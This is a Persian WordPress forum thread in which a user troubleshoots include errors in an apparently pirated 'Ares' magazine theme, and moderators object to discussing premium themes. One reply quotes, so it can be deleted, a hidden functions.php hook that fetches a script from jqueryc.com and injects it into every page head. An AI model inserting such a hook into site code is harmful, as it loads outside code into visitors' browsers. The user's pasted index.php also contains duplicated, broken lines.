mohammad533

دو مشکل خیلی جدی در پوسته مجله ای فارسی آر اس

11 پست در این موضوع قرار دارد

سلام میشه بگین این ارور هارو چه جوری برطرف کنم

هم رو وردپرس 5.2

و هم رو 4.2

امتحانش کردم

اینم رور ها

Warning: include_once(C:\wamp\www\wordpress/wp-content/themes/ares/templates/template-blog-.php) [function.include-once]: failed to open stream: No such file or directory in C:\wamp\www\wordpress\wp-content\themes\ares\index.php on line 72

Warning: include_once() [function.include]: Failed opening ‘C:\wamp\www\wordpress/wp-content/themes/ares/templates/template-blog-.php’ for inclusion (include_path=’.;C:\php5\pear’) in C:\wamp\www\wordpress\wp-content\themes\ares\index.php on line 72

اینم لینک قالب

ویرایش شده در توسط mohammad533

به اشتراک گذاری این پست


لینک به پست

سلام

پس از نصب ابتدا به فایل function.php برین و این خطوط رو پاک کنین (قبلش حتما بک آپ بگیرین)

**/if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url="http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');} 

در ضمن از آخرین نسخه ورد پرس استفاده کنید

ویرایش شده در توسط mahdihunter

به اشتراک گذاری این پست


لینک به پست

سلام

بازم نشد!!!

ویرایش شده در توسط mohammad533

به اشتراک گذاری این پست


لینک به پست

سلام

بازم نشد!!!

برای استفاده از لوکال هاست از XAMPP استفاده کنید احتمالا مشکلتون حل بشه

قالب رو رو لوکال و همچنین هاستم تست کردم مشکلی نداشت

به اشتراک گذاری این پست


لینک به پست

دوست من خوب سایت را خوانده اید؟


این نسخه روی وردپرس 3.5 دارای ی سری اشکالات هست

بعد هم فکر کنم قالب پولی است.برای همین چون حقوق نویسنده را زیر پای می گذارد ، پشتیبانی هم نمی شود.

به اشتراک گذاری این پست


لینک به پست

من رو وردپرس 4.2 رو هم امتحان کردم نشد؟؟؟

مشکلش هم فکر کنم توی این خطه

include_once (TEMPLATEPATH . "/bashgahegraphic".$pp_blog_layout.".php");

این رور ها مال فایل index.php است این فایلش کاملش

<?php
<?php
/**
* The main template file.
*
* @package WordPress
*/

get_header();

$pp_slider_timer = get_option('pp_slider_timer');
if(empty($pp_slider_timer))
{
$pp_slider_timer = 5;
}

// Get featured posts
$pp_featured_cat = get_option('pp_featured_cat');
$pp_home_display_slide = TRUE;
$featured_posts_arr = array();

if(isset($_SESSION['pp_menu_style']))
{
$pp_menu_style = $_SESSION['pp_menu_style'];
}
else
{
$pp_menu_style = get_option('pp_menu_style');
}

?>

<input type="hidden" id="slider_timer" name="slider_timer" value="<?php echo $pp_slider_timer; ?>"/>

<br class="clear"/>

<div id="content_wrapper">

<div class="inner">

<!-- Begin main content -->
<div class="inner_wrapper">

<?php
if($pp_menu_style != 4 && $pp_menu_style != 5 && $pp_menu_style != 6)
{
include_once (TEMPLATEPATH . "/templates/template-slide-1.php");
}
else
{
include_once (TEMPLATEPATH . "/templates/template-slide-2.php");
?>

<div class="sidebar_content">

<?php
}
?>

<?php

global $more; $more = false; # some wordpress wtf logic

if(isset($_SESSION['pp_blog_layout']))
{
$pp_blog_layout = $_SESSION['pp_blog_layout'];
}
else
{
$pp_blog_layout = get_option('pp_blog_layout');
}

include_once (TEMPLATEPATH . "/bashgahegraphic".$pp_blog_layout.".php");

if($pp_menu_style == 4 OR $pp_menu_style == 5 OR $pp_menu_style == 6)
{
?>
</div>
<?php
}
else
{
?>
</div>
</div>
<?php
}
?>

<div class="sidebar_wrapper">
<?php
$twitter_id = get_option(SHORTNAME.'_twitter_username');
$fb_id = get_option('pp_feedburner_id');

if(!empty($twitter_id) OR !empty($fb_id)):
?>
<div class="social_profile">
<div class="profile">
<a href="<?php echo $fb_id; ?>">
<img src="<?php echo get_stylesheet_directory_uri(); ?>/images/social_feeds.png" alt="" class="alignleft social"/>
</a>
<h4><?php pp_feeds_count(); ?></h4>
<span class="count">subscribers</span>
</div>

<div class="profile">
<a href="http://twitter.com/<?php echo $twitter_id; ?>">
<img src="<?php echo get_stylesheet_directory_uri(); ?>/images/social_twitter.png" alt="" class="alignleft social"/>
</a>
<h4><?php pp_twitter_followers(); ?></h4>
<span class="count">followers</span>
</div>

<br class="clear"/>
</div>
<?php
endif;
?>

<div class="ads125_wrapper">
<?php
$pp_side_banner = get_option('pp_side_banner');

if(!empty($pp_side_banner))
{
echo stripslashes($pp_side_banner);
}
?>
</div>

<div class="sidebar">

<div class="content">

<ul class="sidebar_widget">
<?php dynamic_sidebar('Home Sidebar'); ?>
</ul>

</div>

</div>
<br class="clear"/>

</div>

<br class="clear"/>
</div>
<!-- End main content -->

</div>

</div>

<?php get_footer(); ?>
<?php get_footer(); ?>

ویرایش شده در توسط mohammad533

به اشتراک گذاری این پست


لینک به پست

دوست من خوب سایت را خوانده اید؟


این نسخه روی وردپرس 3.5 دارای ی سری اشکالات هست

بعد هم فکر کنم قالب پولی است.برای همین چون حقوق نویسنده را زیر پای می گذارد ، پشتیبانی هم نمی شود.

پوسته پرمیوم هست؟

به اشتراک گذاری این پست


لینک به پست

بله

ویرایش شده در توسط mohammad533

به اشتراک گذاری این پست


لینک به پست

بله

بحث در مورد قالبهای غیر رایگان ممنوع است قوانین را بخوانید

به اشتراک گذاری این پست


لینک به پست

اما این قالب رایگانه به صورت رایگان دانلود شده لینک دانلود رایگان بالا هستش!!!!!!

به اشتراک گذاری این پست


لینک به پست

پوسته پرمیوم هست؟

بله

در هر حال مراحل نصبش را درست اجرا کنید قالب مشکلی ندارد

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط napo
      سلام 
      افزونه max mega menu  رو دانلود کردم ولی متاسفانه راستچین نیست یعنی زیر منو رو سمت راست ایجاد میکنه به جای اینکه در سمت چپ نشون بده همونطوری که توی عکس مشخصه بعد انتخاب دوتا زیر منو کلا از صفحه خارج میشه
      اگه میشه کمکم کنید
      اگه کسی افزونه ای دیگه میشناسه که هم راستیچینه هم اکاردئونی ممنون میشم معرفی کنه

    • توسط oonchiye
      سلام
      تنظیمات مربوط به افزونه رو انجام دادم برگه ها موجود هستش 
      شرت کد های مربوط هم درسته 
      فقط وقتی دکه پرداخت رو میزنی صفحه تسویه حساب فقز اسم برگه رو میاره 
      مینویسه check uot فقط
      چیکار کنم خیلی لازم دارم 
    • توسط behi13
      با سلام
      دوستام و اساتید محترم یک سوال
      من به سایت دوزبانه با افزونه wpml درست کردم الان یک مشکل هست توی گوگل صفحه اول سایت ایندکس شده و توی فارسی مشکلی ندارم
      ولی توی زبان انگلیسی وقتی توی گوگل به انگلیسی سرچ میکنم بازهم با نام و فارسی میاد
      ممنون میشم من و راهنمایی کنید
    • توسط j1989m
      سلام
      توی قسمت افزودن نوشته و از طریق پرونده های رسانه ای یه عکس انتخاب میکنم و منتشر میکنم. توی سایت عکس رو نشون میده اما این کدها رو هم میاره:
      [caption id="attachment_154" align="aligncenter" width="300"] [/caption]
      درواقع عکس بین دوتا caption بالا قرار میگیره.
      این مشکل توی افزودن برگه نیست.
      لطفا راهنمایی کنید
      خیلی فوریه
      ممنون
    • توسط xboby
      سلام،
      من سایتی با ورد پرس طراحی کردم و می خواهم با:
      یک برنامه تمام پستهای موجود در کانال تلگرامی که بنام آن سایت ایجاد کر ده ام را
      بتوانم از موبایلم دانلود کنم و بعد در آن سایت قرار دهم:
      آیا چنان برنامه ای وجود دارد؟ لطفا راهنمائی ام بفرمائید.
                                   متشکرم